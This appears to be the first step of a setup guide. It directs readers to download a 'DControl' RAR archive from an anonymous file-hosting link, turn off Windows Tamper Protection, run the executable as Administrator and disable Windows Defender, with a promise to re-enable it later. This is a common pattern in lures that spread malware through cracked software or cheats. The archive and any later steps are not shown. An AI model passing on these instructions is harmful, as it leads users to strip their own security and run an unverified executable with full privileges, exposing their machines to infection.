# Step 1 - Setup 

You need to install D control:<br /><br />Download: [Here](https://file.garden/ZdpSbegxzVCR-_G6/dcontrol.rar)<br /><br />**Quick setup:**

1. Extract the DControl ZIP.
2. Open **Windows Security → Virus & threat protection → Manage settings**.
3. Temporarily turn **Tamper Protection** off.
4. Run `dControl.exe` **as Administrator**.
5. Click **Disable Windows Defender**.
6. The window should indicate **“Windows Defender is turned off.”**

**When finished:** open DControl again → **Enable Windows Defender**, then turn Tamper Protection back on.<br /><br />
